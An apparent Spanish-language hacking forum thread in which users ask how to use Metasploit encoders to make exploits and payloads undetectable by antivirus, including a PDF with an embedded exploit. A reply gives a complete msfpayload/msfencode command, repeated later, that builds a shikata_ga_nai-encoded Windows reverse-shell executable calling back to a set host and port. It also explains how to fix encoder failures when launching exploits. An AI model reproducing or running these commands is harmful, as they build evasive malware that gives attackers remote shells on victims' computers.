Encoders de Metasploit

[illera88]

Pues lo dicho. ¿Cómo se usal los encoders de metasploit para hacer indetectables nuestros exploits?
¿Se pude hacer indetectabel con el msf un pdf con un exploit incrustado y con un payload reverse_tcp??

Un saludo

[Shell Root]

mmm Los Encoders son usandos de 2 formás!

1. Dentro de la consola Shell de Linux (Pará ver las opciones ejecutar ./msfencode -h)

Código [Seleccionar] Expandir

shell@Alex:~/msf3$ ./msfencode -h

y para usarlo con un archivo binario. Así:

Código [Seleccionar] Expandir

shell@Alex:~/msf3$ ./msfpayload windows/shell_reverse_tcp LHOST=172.0.0.1 LPORT=1234 R | ./msfencode -e x86/shikata_ga_nai -t exe > /home/shellroot/Archivo_Codificado1.exe

2. Al momento de lanzar un Exploit
En ocasiones al momento de lanzar un exploit, nos saldra un hermoso mensaje de... Exploit failed: No encoders encoded the buffer successfully... ahora para solucionar este failed, ejecutamos show encoders, para visualizar los que son soportados por el exploit, y despues, SET Nombre_Encoder.



Con respecto a la otra duda, de encodear un archivo *.PDF, no tengo ni la más minima idea... xD

[alexkof158]

vale tenia en mente esto, seria en vez de poner aaa.exe poner el dd.pdf no?? a ver si se podra encodear este archivo? 

[Shell Root]

Lo dudo alexkof158, ya que estamos refiriendonos a un Ejecutable. Mirad...

Código [Seleccionar] Expandir

shell@Alex:~/msf3$ ./msfpayload windows/shell_reverse_tcp LHOST=172.0.0.1 LPORT=1234 R | ./msfencode -e x86/shikata_ga_nai -t exe > /home/shellroot/Archivo_Codificado1.exe
En la siguiente cadena, nos referimos a un Archivo Ejecutable

Código [Seleccionar] Expandir

shell@Alex:~/msf3$  [...] exe > /home/shellroot/Archivo_Codificado1.exe